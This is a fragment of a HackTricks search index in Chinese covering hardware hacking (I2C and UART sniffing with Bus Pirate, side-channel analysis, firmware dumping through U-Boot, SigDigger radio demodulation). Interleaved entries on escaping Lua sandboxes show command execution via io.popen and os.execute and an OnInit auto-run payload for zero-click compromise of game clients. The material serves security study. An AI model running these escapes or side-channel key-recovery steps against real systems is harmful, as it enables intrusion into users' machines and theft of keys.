Found devices at:\\n0xA0(0x50 W) 0xA1(0x50 R) # Note that each slave will have a write address and a read address\\n# 0xA0 ad 0xA1 in the previous case # Write \\"BBB\\" in address 0x69\\nI2C>[0xA0 0x00 0x69 0x42 0x42 0x42]\\nI2C START BIT\\nWRITE: 0xA0 ACK\\nWRITE: 0x00 ACK\\nWRITE: 0x69 ACK\\nWRITE: 0x42 ACK\\nWRITE: 0x42 ACK\\nWRITE: 0x42 ACK\\nI2C STOP BIT # Prepare to read from address 0x69\\nI2C>[0xA0 0x00 0x69]\\nI2C START BIT\\nWRITE: 0xA0 ACK\\nWRITE: 0x00 ACK\\nWRITE: 0x69 ACK\\nI2C STOP BIT # Read 20B from address 0x69 configured before\\nI2C>[0xA1 r:20]\\nI2C START BIT\\nWRITE: 0xA1 ACK\\nREAD: 0x42 ACK 0x42 ACK 0x42 ACK 0x20 ACK 0x48 ACK 0x69 ACK 0x20 ACK 0x44 ACK 0x72 ACK 0x65 ACK 0x67 ACK 0x21 ACK 0x20 ACK 0x41 ACK 0x41 ACK 0x41 ACK 0x00 ACK 0xFF ACK 0xFF ACK 0xFF\\nNACK","breadcrumbs":"Hardware Hacking » I2C » Bus Pirate","id":"10253","title":"Bus Pirate"},"10254":{"body":"在这个场景中,我们将嗅探 Arduino 和之前的 EPROM 之间的 I2C 通信,您只需将两个设备连接起来,然后将总线海盗连接到 SCL、SDA 和 GND 引脚: bash I2C>m\\n1. HiZ\\n2. 1-WIRE\\n3. UART\\n4. I2C\\n5. SPI\\n6. 2WIRE\\n7. 3WIRE\\n8. KEYB\\n9. LCD\\n10. PIC\\n11. DIO\\nx. exit(without change) (1)>4\\nI2C mode:\\n1. Software\\n2. Hardware (1)>1\\nSet speed:\\n1. ~5kHz\\n2. ~50kHz\\n3. ~100kHz\\n4. ~240kHz (1)>1\\nClutch disengaged!!!\\nTo finish setup, start up the power supplies with command \'W\'\\nReady # EVEN IF YOU ARE GOING TO SNIFF YOU NEED TO POWER ON! I2C>W\\nPOWER SUPPLIES ON\\nClutch engaged!!! # Start sniffing, you can see we sniffed a write command I2C>(2)\\nSniffer\\nAny key to exit\\n[0xA0+0x00+0x69+0x41+0x41+0x41+0x20+0x48+0x69+0x20+0x44+0x72+0x65+0x67+0x21+0x20+0x41+0x41+0x41+0x00+] tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Hardware Hacking » I2C » Sniffer","id":"10254","title":"Sniffer"},"10255":{"body":"Reading time: 7 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 侧信道攻击通过观察与内部状态 相关 的物理或微架构“泄漏”来恢复秘密,但这些“泄漏” 不是 设备逻辑接口的一部分。 示例包括测量智能卡瞬时电流到滥用网络上的CPU电源管理效应。","breadcrumbs":"Hardware Hacking » Side Channel Analysis » 侧信道分析攻击","id":"10255","title":"侧信道分析攻击"},"10256":{"body":"通道 典型目标 仪器 电力消耗 智能卡、物联网MCU、FPGA 示波器 + 分流电阻/高频探头(例如CW503) 电磁场(EM) CPU、RFID、AES加速器 H场探头 + LNA,ChipWhisperer/RTL-SDR 执行时间/缓存 桌面和云CPU 高精度计时器(rdtsc/rdtscp),远程飞行时间 声学/机械 键盘、3D打印机、继电器 MEMS麦克风,激光振动计 光学和热 LED、激光打印机、DRAM 光电二极管/高速相机,红外相机 故障诱导 ASIC/MCU加密 时钟/电压故障,EMFI,激光注入","breadcrumbs":"Hardware Hacking » Side Channel Analysis » 主要泄漏通道","id":"10256","title":"主要泄漏通道"},"10257":{"body":"","breadcrumbs":"Hardware Hacking » Side Channel Analysis » 电力分析","id":"10257","title":"电力分析"},"10258":{"body":"观察 单个 波形并直接将峰值/谷值与操作(例如DES S盒)关联。 python # ChipWhisperer-husky example – capture one AES trace\\nfrom chipwhisperer.capture.api.programmers import STMLink\\nfrom chipwhisperer.capture import CWSession\\ncw = CWSession(project=\'aes\')\\ntrig = cw.scope.trig\\ncw.connect(cw.capture.scopes[0])\\ncw.capture.init()\\ntrace = cw.capture.capture_trace()\\nprint(trace.wave) # numpy array of power samples","breadcrumbs":"Hardware Hacking » Side Channel Analysis » 简单电力分析(SPA)","id":"10258","title":"简单电力分析(SPA)"},"10259":{"body":"获取 N > 1 000 跟踪,假设密钥字节 k,计算 HW/HD 模型并与泄漏进行相关性分析。 python import numpy as np\\ncorr = np.corrcoef(leakage_model(k), traces[:,sample]) CPA 仍然是最先进的技术,但机器学习变体(MLA,深度学习 SCA)现在主导了 ASCAD-v2(2023)等比赛。","breadcrumbs":"Hardware Hacking » Side Channel Analysis 
» Differential/Correlation Power Analysis (DPA/CPA)","id":"10259","title":"Differential/Correlation Power Analysis (DPA/CPA)"},"1026":{"body":"Reading time: 8 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 本页收集了用于枚举并突破嵌入在应用程序中的 Lua “沙箱”的实用技术(尤其是游戏客户端、插件或应用内脚本引擎)。许多引擎暴露出受限的 Lua 环境,但仍会留下可访问的强大全局,这些全局可导致任意命令执行,甚至在暴露字节码加载器时引发本地内存破坏。 关键思路: 将 VM 视为未知环境:枚举 _G,发现哪些危险原语可达。 当 stdout/print 被屏蔽时,滥用 VM 内的任意 UI/IPC 通道作为输出接收器以观察结果。 如果 io/os 被暴露,通常可以直接执行命令(io.popen、os.execute)。 如果暴露了 load/loadstring/loadfile,执行精心构造的 Lua 字节码可以在某些版本中破坏内存安全(≤5.1 的验证器可被绕过;5.2 移除了验证器),从而实现高级利用。","breadcrumbs":"Lua Sandbox Escape » 绕过 Lua 沙箱(嵌入式 VM、游戏客户端)","id":"1026","title":"绕过 Lua 沙箱(嵌入式 VM、游戏客户端)"},"10260":{"body":"近场 EM 探头(500 MHz–3 GHz)泄漏与功率分析相同的信息 而不 插入分流器。2024 年的研究表明,使用频谱相关和低成本 RTL-SDR 前端可以在 >10 cm 的距离内从 STM32 恢复密钥。","breadcrumbs":"Hardware Hacking » Side Channel Analysis » 电磁分析 (EMA)","id":"10260","title":"电磁分析 (EMA)"},"10261":{"body":"现代 CPU 通过共享资源泄漏秘密: Hertzbleed (2022) – DVFS 频率缩放与汉明权重相关,允许 远程 提取 EdDSA 密钥。 Downfall / Gather Data Sampling (Intel, 2023) – 瞬态执行读取跨 SMT 线程的 AVX-gather 数据。 Zenbleed (AMD, 2023) & Inception (AMD, 2023) – 投机向量误预测泄漏跨域寄存器。","breadcrumbs":"Hardware Hacking » Side Channel Analysis » 定时与微架构攻击","id":"10261","title":"定时与微架构攻击"},"10262":{"body":"2024 年的 \\"​iLeakKeys\\" 显示从 智能手机麦克风通过 Zoom 恢复笔记本电脑按键的准确率为 95% ,使用 CNN 分类器。 高速光电二极管捕获 DDR4 活动 LED,并在 <1 分钟内重构 AES 轮密钥(BlackHat 2023)。","breadcrumbs":"Hardware Hacking » Side Channel Analysis » 声学与光学攻击","id":"10262","title":"声学与光学攻击"},"10263":{"body":"将故障与侧信道泄漏结合可以快捷地搜索密钥(例如 1-trace AES DFA)。最近的业余爱好者价格工具: ChipSHOUTER & PicoEMP – 亚 1 ns 电磁脉冲故障。 GlitchKit-R5 (2025) – 开源时钟/电压故障平台,支持 RISC-V SoC。","breadcrumbs":"Hardware Hacking » Side 
Channel Analysis » 故障注入与差分故障分析 (DFA)","id":"10263","title":"故障注入与差分故障分析 (DFA)"},"10264":{"body":"确定泄漏通道和安装点(VCC 引脚,去耦电容,近场点)。 插入触发器(GPIO 或基于模式)。 收集 >1 k 跟踪,使用适当的采样/过滤器。 预处理(对齐,均值去除,低通/高通滤波,小波,PCA)。 统计或 ML 密钥恢复(CPA,MIA,DL-SCA)。 验证并对异常值进行迭代。","breadcrumbs":"Hardware Hacking » Side Channel Analysis » 典型攻击工作流程","id":"10264","title":"典型攻击工作流程"},"10265":{"body":"恒定时间 实现和内存硬算法。 掩码/洗牌 – 将秘密分割成随机份额;第一阶抗性由 TVLA 认证。 隐藏 – 芯片内电压调节器,随机时钟,双轨逻辑,EM 屏蔽。 故障检测 – 冗余计算,阈值签名。 操作 – 在加密内核中禁用 DVFS/涡轮,隔离 SMT,禁止在多租户云中共存。","breadcrumbs":"Hardware Hacking » Side Channel Analysis » 防御与加固","id":"10265","title":"防御与加固"},"10266":{"body":"ChipWhisperer-Husky (2024) – 500 MS/s 示波器 + Cortex-M 触发器;Python API 如上。 Riscure Inspector & FI – 商业,支持自动化泄漏评估(TVLA-2.0)。 scaaml – 基于 TensorFlow 的深度学习 SCA 库(v1.2 – 2025)。 pyecsca – ANSSI 开源 ECC SCA 框架。","breadcrumbs":"Hardware Hacking » Side Channel Analysis » 工具与框架","id":"10266","title":"工具与框架"},"10267":{"body":"ChipWhisperer Documentation Hertzbleed Attack Paper tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Hardware Hacking » Side Channel Analysis » 参考文献","id":"10267","title":"参考文献"},"10268":{"body":"Reading time: 14 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Hardware Hacking » UART » UART","id":"10268","title":"UART"},"10269":{"body":"UART是一种串行协议,这意味着它一次传输一个比特的数据。相比之下,平行通信协议通过多个通道同时传输数据。常见的串行协议包括RS-232、I2C、SPI、CAN、以太网、HDMI、PCI Express和USB。 通常,在UART处于空闲状态时,线路保持高电平(逻辑1值)。然后,为了信号数据传输的开始,发射器向接收器发送一个起始位,此时信号保持低电平(逻辑0值)。接下来,发射器发送五到八个数据位,包含实际消息,后面跟着一个可选的奇偶校验位和一个或两个停止位(逻辑1值),具体取决于配置。用于错误检查的奇偶校验位在实际中很少见。停止位(或位)表示传输结束。 我们称最常见的配置为8N1:八个数据位,无奇偶校验,一个停止位。例如,如果我们想在8N1 UART配置中发送字符C,或ASCII中的0x43,我们将发送以下位:0(起始位);0, 1, 0, 0, 0, 0, 1, 1(0x43的二进制值),和0(停止位)。 与UART通信的硬件工具: USB转串行适配器 带有CP2102或PL2303芯片的适配器 多功能工具,如:Bus Pirate、Adafruit FT232H、Shikra或Attify Badge","breadcrumbs":"Hardware Hacking » UART » 基本信息","id":"10269","title":"基本信息"},"1027":{"body":"转储全局环境以清点可达的表/函数: lua -- Minimal _G dumper for any Lua sandbox with some output primitive `out`\\nlocal function dump_globals(out)\\nout(\\"=== DUMPING _G ===\\")\\nfor k, v in pairs(_G) do\\nout(tostring(k) .. \\" = \\" .. tostring(v))\\nend\\nend 如果没有 print() 可用,可改用 in-VM 通道。来自 MMO housing script VM 的示例:chat output 只有在 sound call 之后才会生效;以下构建了一个可靠的输出函数: lua -- Build an output channel using in-game primitives\\nlocal function ButlerOut(label)\\n-- Some engines require enabling an audio channel before speaking\\nH.PlaySound(0, \\"r[1]\\") -- quirk: required before H.Say()\\nreturn function(msg)\\nH.Say(label or 1, msg)\\nend\\nend function OnMenu(menuNum)\\nif menuNum ~= 3 then return end\\nlocal out = ButlerOut(1)\\ndump_globals(out)\\nend 将此模式泛化到你的目标:任何接受字符串的 textbox, toast, logger, or UI callback 都可以作为 stdout 用于侦察。","breadcrumbs":"Lua Sandbox Escape » 枚举沙箱环境","id":"1027","title":"枚举沙箱环境"},"10270":{"body":"UART有4个端口: TX (发送)、 RX (接收)、 Vcc (电压)和 GND (接地)。你可能会在PCB上找到带有**TX 和 RX 字母的4个端口。但如果没有指示,你可能需要使用 万用表 或 逻辑分析仪**自己寻找它们。 使用 万用表 并关闭设备电源: 要识别 GND 引脚,使用 连续性测试 模式,将黑色引线放入接地,使用红色引线测试,直到你听到万用表发出声音。PCB上可能会找到多个GND引脚,因此你可能找到或没有找到属于UART的引脚。 要识别 VCC端口 ,设置 直流电压模式 并将其设置为20 V电压。黑色探头接地,红色探头接引脚。打开设备电源。如果万用表测量到恒定电压为3.3 V或5 
V,你就找到了Vcc引脚。如果得到其他电压,请尝试其他端口。 要识别 TX 端口 ,将 直流电压模式 设置为20 V电压,黑色探头接地,红色探头接引脚,打开设备电源。如果你发现电压波动几秒钟后稳定在Vcc值,你很可能找到了TX端口。这是因为在开机时,它会发送一些调试数据。 RX端口 是与其他3个端口最接近的,它的电压波动最低,所有UART引脚中整体值最低。 你可以混淆TX和RX端口,没什么问题,但如果混淆GND和VCC端口,你可能会烧毁电路。 在某些目标设备中,制造商通过禁用RX或TX甚至两者来禁用UART端口。在这种情况下,追踪电路板中的连接并找到一些断点可能会有所帮助。确认没有检测到UART和电路断开的一个强烈提示是检查设备保修。如果设备附带某些保修,制造商会留下某些调试接口(在这种情况下是UART),因此,必须断开UART并在调试时重新连接。这些断点引脚可以通过焊接或跳线连接。","breadcrumbs":"Hardware Hacking » UART » 识别UART端口","id":"10270","title":"识别UART端口"},"10271":{"body":"识别正确波特率的最简单方法是查看 TX引脚的输出并尝试读取数据 。如果接收到的数据不可读,请切换到下一个可能的波特率,直到数据变得可读。你可以使用USB转串行适配器或像Bus Pirate这样的多功能设备来做到这一点,并配合一个辅助脚本,如 baudrate.py 。最常见的波特率为9600、38400、19200、57600和115200。 caution 重要的是要注意,在此协议中,你需要将一个设备的TX连接到另一个设备的RX!","breadcrumbs":"Hardware Hacking » UART » 识别UART波特率","id":"10271","title":"识别UART波特率"},"10272":{"body":"CP210X芯片广泛用于许多原型板,如NodeMCU(带esp8266)进行串行通信。这些适配器相对便宜,可以用于连接目标的UART接口。该设备有5个引脚:5V、GND、RXD、TXD、3.3V。确保连接目标支持的电压,以避免任何损坏。最后,将适配器的RXD引脚连接到目标的TXD,将适配器的TXD引脚连接到目标的RXD。 如果适配器未被检测到,请确保主机系统中已安装CP210X驱动程序。一旦适配器被检测到并连接,可以使用picocom、minicom或screen等工具。 要列出连接到Linux/MacOS系统的设备: ls /dev/ 要与UART接口进行基本交互,请使用以下命令: picocom /dev/ --baud 对于minicom,请使用以下命令进行配置: minicom -s 在 Serial port setup 选项中配置波特率和设备名称等设置。 配置完成后,使用命令 minicom 启动以获取 UART 控制台。","breadcrumbs":"Hardware Hacking » UART » CP210X UART到TTY适配器","id":"10272","title":"CP210X UART到TTY适配器"},"10273":{"body":"如果没有可用的 UART 串行到 USB 适配器,可以使用 Arduino UNO R3 进行快速破解。由于 Arduino UNO R3 通常随处可用,这可以节省很多时间。 Arduino UNO R3 板上内置了 USB 到串行适配器。要获取 UART 连接,只需将 Atmel 328p 微控制器芯片从板上拔出。此破解适用于 Atmel 328p 未焊接在板上的 Arduino UNO R3 变体(使用的是 SMD 版本)。将 Arduino 的 RX 引脚(数字引脚 0)连接到 UART 接口的 TX 引脚,将 Arduino 的 TX 引脚(数字引脚 1)连接到 UART 接口的 RX 引脚。 最后,建议使用 Arduino IDE 获取串行控制台。在菜单的 tools 部分,选择 Serial Console 选项,并根据 UART 接口设置波特率。","breadcrumbs":"Hardware Hacking » UART » 通过 Arduino UNO R3 的 UART (可拆卸的 Atmel 328p 芯片板)","id":"10273","title":"通过 Arduino UNO R3 的 UART (可拆卸的 Atmel 328p 芯片板)"},"10274":{"body":"在这种情况下,我们将嗅探 Arduino 的 UART 通信,该通信将程序的所有打印信息发送到串行监视器。 bash # Check 
the modes\\nUART>m\\n1. HiZ\\n2. 1-WIRE\\n3. UART\\n4. I2C\\n5. SPI\\n6. 2WIRE\\n7. 3WIRE\\n8. KEYB\\n9. LCD\\n10. PIC\\n11. DIO\\nx. exit(without change) # Select UART\\n(1)>3\\nSet serial port speed: (bps)\\n1. 300\\n2. 1200\\n3. 2400\\n4. 4800\\n5. 9600\\n6. 19200\\n7. 38400\\n8. 57600\\n9. 115200\\n10. BRG raw value # Select the speed the communication is occurring on (you BF all this until you find readable things)\\n# Or you could later use the macro (4) to try to find the speed\\n(1)>5\\nData bits and parity:\\n1. 8, NONE *default\\n2. 8, EVEN\\n3. 8, ODD\\n4. 9, NONE # From now on pulse enter for default\\n(1)>\\nStop bits:\\n1. 1 *default\\n2. 2\\n(1)>\\nReceive polarity:\\n1. Idle 1 *default\\n2. Idle 0\\n(1)>\\nSelect output type:\\n1. Open drain (H=Hi-Z, L=GND)\\n2. Normal (H=3.3V, L=GND) (1)>\\nClutch disengaged!!!\\nTo finish setup, start up the power supplies with command \'W\'\\nReady # Start\\nUART>W\\nPOWER SUPPLIES ON\\nClutch engaged!!! # Use macro (2) to read the data of the bus (live monitor)\\nUART>(2)\\nRaw UART input\\nAny key to exit\\nEscritura inicial completada:\\nAAA Hi Dreg! 
AAA\\nwaiting a few secs to repeat....","breadcrumbs":"Hardware Hacking » UART » Bus Pirate","id":"10274","title":"Bus Pirate"},"10275":{"body":"UART 控制台提供了一种在运行时环境中处理底层固件的好方法。但是,当 UART 控制台访问为只读时,可能会引入许多限制。在许多嵌入式设备中,固件存储在 EEPROM 中,并在具有易失性内存的处理器中执行。因此,固件保持只读状态,因为制造时的原始固件就在 EEPROM 内部,任何新文件都可能因易失性内存而丢失。因此,在处理嵌入式固件时,转储固件是一项有价值的工作。 有很多方法可以做到这一点,SPI 部分涵盖了从 EEPROM 中直接提取固件的各种设备的方法。尽管如此,建议首先尝试通过 UART 转储固件,因为使用物理设备和外部交互转储固件可能存在风险。 从 UART 控制台转储固件需要首先获取对引导加载程序的访问权限。许多流行的供应商使用 uboot(通用引导加载程序)作为其引导加载程序来加载 Linux。因此,获取对 uboot 的访问权限是必要的。 要访问引导加载程序,请将 UART 端口连接到计算机,并使用任何串行控制台工具,并保持设备的电源断开。一旦设置完成,按下 Enter 键并保持不放。最后,连接设备的电源并让其启动。 这样做会中断 uboot 的加载并提供一个菜单。建议了解 uboot 命令并使用帮助菜单列出它们。这可能是 help 命令。由于不同的供应商使用不同的配置,因此有必要分别理解每个配置。 通常,转储固件的命令是: md 这代表“内存转储”。这将把内存(EEPROM 内容)转储到屏幕上。建议在开始程序之前记录串行控制台输出,以捕获内存转储。 最后,只需从日志文件中剥离所有不必要的数据,并将文件存储为 filename.rom,然后使用 binwalk 提取内容: binwalk -e 这将根据在十六进制文件中找到的签名列出 EEPROM 的可能内容。 尽管需要注意的是,即使正在使用 uboot,它并不总是解锁的。如果 Enter 键没有任何反应,请检查其他键,如空格键等。如果引导加载程序被锁定且没有被中断,则此方法将不起作用。要检查 uboot 是否是设备的引导加载程序,请在设备启动时检查 UART 控制台上的输出。它可能会在启动时提到 uboot。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Hardware Hacking » UART » 通过 UART 控制台转储固件","id":"10275","title":"通过 UART 控制台转储固件"},"10276":{"body":"Reading time: 13 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Hardware Hacking » Radio » Radio","id":"10276","title":"Radio"},"10277":{"body":"SigDigger 是一个免费的数字信号分析仪,适用于GNU/Linux和macOS,旨在提取未知无线电信号的信息。它通过SoapySDR支持多种SDR设备,并允许可调的FSK、PSK和ASK信号解调,解码模拟视频,分析突发信号并实时收听模拟语音通道。","breadcrumbs":"Hardware Hacking » Radio » SigDigger","id":"10277","title":"SigDigger"},"10278":{"body":"安装后,有一些配置选项可以考虑。 在设置(第二个标签按钮)中,您可以选择 SDR设备 或 选择一个文件 进行读取,以及要调谐的频率和采样率(如果您的PC支持,建议最高可达2.56Msps)。 在GUI行为中,如果您的PC支持,建议启用一些选项: note 如果您发现您的PC没有捕获到信号,请尝试禁用OpenGL并降低采样率。","breadcrumbs":"Hardware Hacking » Radio » Basic Config","id":"10278","title":"Basic Config"},"10279":{"body":"只需 捕获信号的一段时间并分析它 ,只需按住“Push to capture”按钮,保持所需时间。 SigDigger的 调谐器 有助于 捕获更好的信号 (但也可能会降低信号质量)。理想情况下,从0开始,继续 增大 ,直到您发现引入的 噪声 大于您所需的 信号改善 。","breadcrumbs":"Hardware Hacking » Radio » Uses","id":"10279","title":"Uses"},"1028":{"body":"如果沙箱仍然暴露标准库 io or os,你很可能可以立即执行命令: lua -- Windows example\\nio.popen(\\"calc.exe\\") -- Cross-platform variants depending on exposure\\nos.execute(\\"/usr/bin/id\\")\\nio.popen(\\"/bin/sh -c \'id\'\\") 执行发生在 client process 内;许多阻止 external debuggers 的 anti-cheat/antidebug 层并不会阻止 in-VM process creation。 还要检查:package.loadlib (arbitrary DLL/.so loading)、require with native modules、LuaJIT\'s ffi (if present)、以及 debug library(可以在 VM 内提升权限)。","breadcrumbs":"Lua Sandbox Escape » 如果暴露了 io/os,可以直接执行命令","id":"1028","title":"如果暴露了 io/os,可以直接执行命令"},"10280":{"body":"使用 SigDigger 与您想要收听的频道同步,配置“基带音频预览”选项,配置带宽以获取所有发送的信息,然后将调谐器设置到噪声真正开始增加之前的水平:","breadcrumbs":"Hardware Hacking » Radio » Synchronize with radio channel","id":"10280","title":"Synchronize with radio channel"},"10281":{"body":"当设备发送信息突发时,通常 第一部分是前导码 ,因此您 不必担心 如果您 没有找到信息 或 那里有一些错误 。 在信息帧中,您通常应该 找到不同的帧彼此对齐 : 在恢复比特后,您可能需要以某种方式处理它们 。例如,在曼彻斯特编码中,上+下将是1或0,下+上将是另一个。因此,1和0的对(上和下)将是真实的1或真实的0。 即使信号使用曼彻斯特编码(不可能找到连续超过两个的0或1),您也可能在前导码中 找到多个1或0 !","breadcrumbs":"Hardware Hacking » Radio » Interesting tricks","id":"10281","title":"Interesting 
tricks"},"10282":{"body":"有3种方式在信号中存储信息:调制 幅度 、 频率 或 相位 。 如果您正在检查信号,有不同的方法可以尝试找出用于存储信息的方式(更多方法见下文),但一个好的方法是检查IQ图。 检测AM :如果在IQ图中出现例如 2个圆圈 (可能一个在0,另一个在不同的幅度),这可能意味着这是一个AM信号。这是因为在IQ图中,0和圆圈之间的距离是信号的幅度,因此很容易可视化使用的不同幅度。 检测PM :如前图所示,如果您发现小圆圈彼此无关,这可能意味着使用了相位调制。这是因为在IQ图中,点与0,0之间的角度是信号的相位,这意味着使用了4种不同的相位。 请注意,如果信息隐藏在相位变化的事实中,而不是相位本身,您将不会看到不同的相位清晰区分。 检测FM :IQ没有识别频率的字段(到中心的距离是幅度,角度是相位)。 因此,要识别FM,您应该 在此图中基本上只看到一个圆 。 此外,不同的频率通过IQ图的 速度加速穿过圆 来“表示”(因此在SysDigger中选择信号时,IQ图被填充,如果您发现创建的圆中的加速或方向变化,这可能意味着这是FM):","breadcrumbs":"Hardware Hacking » Radio » Uncovering modulation type with IQ","id":"10282","title":"Uncovering modulation type with IQ"},"10283":{"body":"","breadcrumbs":"Hardware Hacking » Radio » AM Example","id":"10283","title":"AM Example"},"10284":{"body":"Checking the envelope 使用 SigDigger 检查AM信息,仅查看 包络 ,您可以看到不同的清晰幅度水平。所用信号以AM发送信息脉冲,这就是一个脉冲的样子: 这就是符号的一部分与波形的样子: Checking the Histogram 您可以 选择包含信息的整个信号 ,选择 幅度 模式和 选择 ,然后单击 直方图 。您可以观察到仅找到2个清晰的水平。 例如,如果您在此AM信号中选择频率而不是幅度,您只会找到1个频率(没有信息调制在频率上仅使用1个频率)。 如果您发现很多频率,这可能不会是FM,可能信号频率只是因为频道而被修改。 With IQ 在此示例中,您可以看到有一个 大圆 ,但也有 很多点在中心 。","breadcrumbs":"Hardware Hacking » Radio » Uncovering AM","id":"10284","title":"Uncovering AM"},"10285":{"body":"With one symbol 选择您能找到的最小符号(以确保它只是1个),并检查“选择频率”。在这种情况下,它将是1.013kHz(即1kHz)。 With a group of symbols 您还可以指示要选择的符号数量,SigDigger将计算1个符号的频率(选择的符号越多,可能越好)。在这种情况下,我选择了10个符号,“选择频率”为1.004 Khz:","breadcrumbs":"Hardware Hacking » Radio » Get Symbol Rate","id":"10285","title":"Get Symbol Rate"},"10286":{"body":"发现这是一个 AM调制 信号和 符号率 (并且知道在这种情况下某个上意味着1,某个下意味着0),很容易 获取信号中编码的比特 。因此,选择包含信息的信号并配置采样和决策,然后按下采样(检查 幅度 已选择,发现的 符号率 已配置, Gadner时钟恢复 已选择): 同步到选择间隔 意味着如果您之前选择了间隔以找到符号率,则将使用该符号率。 手动 意味着将使用指示的符号率。 在 固定间隔选择 中,您指示应选择的间隔数量,并从中计算符号率。 Gadner时钟恢复 通常是最佳选项,但您仍需指示一些近似的符号率。 按下采样后,出现以下内容: 现在,为了让SigDigger理解 信息承载的水平范围 ,您需要单击 较低水平 并保持按住,直到达到最高水平: 如果例如有 4个不同的幅度水平 ,您应该将 每个符号的比特数配置为2 ,并从最小值选择到最大值。 最后 增加****缩放 和 更改行大小 ,您可以看到比特(您可以选择所有并复制以获取所有比特): 如果信号每个符号有超过1个比特(例如2),SigDigger 无法知道哪个符号是 00、01、10、11,因此它将使用不同的 灰度 来表示每个(如果您复制比特,它将使用 
0到3的数字 ,您需要处理它们)。 此外,使用 编码 如 曼彻斯特 , 上+下 可以是 1或0 ,而下+上可以是1或0。在这些情况下,您需要**处理获得的上(1)和下(0)**以替换成对的01或10为0或1。","breadcrumbs":"Hardware Hacking » Radio » Get Bits","id":"10286","title":"Get Bits"},"10287":{"body":"","breadcrumbs":"Hardware Hacking » Radio » FM Example","id":"10287","title":"FM Example"},"10288":{"body":"Checking the frequencies and waveform 发送信息调制为FM的信号示例: 在前面的图像中,您可以很好地观察到 使用了2个频率 ,但如果您 观察 波形,您可能 无法正确识别这2个不同的频率 : 这是因为我在两个频率上捕获了信号,因此一个大约是另一个的负值: 如果同步频率 更接近一个频率而不是另一个 ,您可以轻松看到这2个不同的频率: Checking the histogram 检查带有信息的信号的频率直方图,您可以轻松看到2个不同的信号: 在这种情况下,如果您检查 幅度直方图 ,您将发现 只有一个幅度 ,因此 不能是AM (如果您发现很多幅度,可能是因为信号在频道中失去了功率): 这将是相位直方图(这清楚表明信号不是相位调制): With IQ IQ没有识别频率的字段(到中心的距离是幅度,角度是相位)。 因此,要识别FM,您应该 在此图中基本上只看到一个圆 。 此外,不同的频率通过IQ图的 速度加速穿过圆 来“表示”(因此在SysDigger中选择信号时,IQ图被填充,如果您发现创建的圆中的加速或方向变化,这可能意味着这是FM):","breadcrumbs":"Hardware Hacking » Radio » Uncovering FM","id":"10288","title":"Uncovering FM"},"10289":{"body":"您可以使用 与AM示例中使用的相同技术 来获取符号率,一旦您找到了承载符号的频率。","breadcrumbs":"Hardware Hacking » Radio » Get Symbol Rate","id":"10289","title":"Get Symbol Rate"},"1029":{"body":"如果 host application 将脚本推送到 clients 且 VM 暴露 auto-run hooks(例如 OnInit/OnLoad/OnEnter),则在脚本加载时立即将你的 payload 放到那里,以实现 drive-by compromise: lua function OnInit()\\nio.popen(\\"calc.exe\\") -- or any command\\nend 任何等效的回调(OnLoad、OnEnter 等)在脚本被传输并自动在客户端执行时会将此技术泛化。","breadcrumbs":"Lua Sandbox Escape » 通过 auto-run callbacks 的 Zero-click 触发器","id":"1029","title":"通过 auto-run callbacks 的 Zero-click 触发器"},"10290":{"body":"您可以使用 与AM示例中使用的相同技术 来获取比特,一旦您 发现信号是频率调制的 和 符号率 。 tip 